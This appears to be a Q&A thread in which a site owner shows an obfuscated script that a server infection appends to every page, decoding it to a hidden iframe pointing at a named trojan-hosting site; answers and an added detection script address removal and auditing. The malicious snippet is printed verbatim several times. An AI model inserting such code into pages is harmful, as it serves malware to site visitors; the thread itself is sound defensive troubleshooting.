Question

The server that has my website on it also has a virus on it.

The virus injects the malicious code

<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>

onto EVERY single page which is served, and it is being preprocessed by Apache or something similar to add it to the end of the file.

I created a test file, with the following code:

<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
</body>
</html>

It isn't pretty, but it served its purpose.

When viewing the page in my browser, I get

<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script> 
</body> 
</html>

which can be viewed from www.sagamountain.com/testfile.html (warning, this page is infected)

I need to programmatically stop that div and that script from executing, as it is an iframe to a site with a trojan on it. HTML, CSS, or JS, I just need some way to prevent that JS from executing.

It is already display:none so you cannot see it, but how can I prevent the iframe from ever loading at all?

Thanks for the help! The unescape thing resolves to an iframe to http://ncccnnnc.cn/img/index.php which is clearly the source of my troubles. Don't go to that site!

EDIT: This is a followup to https://serverfault.com/questions/78439/my-website-is-infected-i-restored-a-backup-of-the-uninfected-files-how-long-wil/78459#78459
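
The check described in the question (compare a file as it sits on disk with what the server actually returns) can be automated to confirm when the server is clean again. This is an added example, not part of the original post; the function names, the sample page and the `injected.example.invalid` payload are constructed for illustration.

```javascript
// Constructed sample: the file on disk and the response the server returned.
const SOURCE = ['<html>', '<body>', '<h1>Test HTML File</h1>', '</body>', '</html>'].join('\n');
const HIDDEN = "<iframe src='http://injected.example.invalid/x.php' style='display:none;'></iframe>";
// Percent-encode every character, the same obfuscation the injected script uses.
const encode = s => Array.from(s, c => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const SERVED = SOURCE.replace('</body>',
  '<b id="x"></b><script>document.write(unescape("' + encode(HIDDEN) + '"));</script> \n</body> ');

// Lines in the served response that do not exist in the on-disk file.
// Trailing whitespace is ignored, since the server may re-emit lines with padding.
function injectedLines(source, served) {
  const known = new Set(source.split(/\r?\n/).map(l => l.trim()));
  return served.split(/\r?\n/).map(l => l.trim()).filter(l => l && !known.has(l));
}

// Decode runs of %XX escapes as plain text. Nothing is evaluated or written to a DOM.
function decodeEscapes(text) {
  return (text.match(/(?:%[0-9a-f]{2}){4,}/gi) || []).map(run =>
    run.replace(/%([0-9a-f]{2})/gi, (_, hex) => String.fromCharCode(parseInt(hex, 16))));
}

// Report injected lines and any iframe/script URLs they load, including URLs
// hidden behind unescape()-style encoding.
function auditResponse(source, served) {
  const lines = injectedLines(source, served);
  const urls = [];
  const srcAttr = /<(?:iframe|script)\b[^>]*\bsrc\s*=\s*['"]?([^'"\s>]+)/gi;
  for (const line of lines) {
    for (const text of [line, ...decodeEscapes(line)]) {
      for (const m of text.matchAll(srcAttr)) urls.push(m[1]);
    }
  }
  return { clean: lines.length === 0, lines, urls };
}

console.log(auditResponse(SOURCE, SERVED));
```

In practice `served` would be the body fetched from the live URL and `source` the same file read from a trusted copy.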


Solution

I'm sorry that I can't answer your specific question, but I think that you're looking at this the wrong way. What you need to do is not strip out the virus-inserted HTML; what you need to do is talk to your web host/sysadmin and strip out the virus.

Treating the symptoms won't cure the infection. Treating the disease, however, will also treat the symptoms as well as removing the virus.

OTHER TIPS

The file that is in your server is a PHP file; look in the comments here.

Cyber, if you have to wait on the server to be fixed by someone else, I'd say you should try ending your documents with an open <noscript> tag or open HTML comment tag.

You can't use JavaScript to stop content that hasn't been rendered from doing so, unless you use document.write and one of the above tags (noscript/comment). Also, you can't do anything by placing a script after, as it is already too late (the content is there already).

It is an ugly solution, but it should prevent your site visitors from experiencing the virus. It also makes your markup invalid, but any browser should be able to parse it and render it as you expect.

Best of luck with the server!

Licensed under: CC-BY-SA with attribution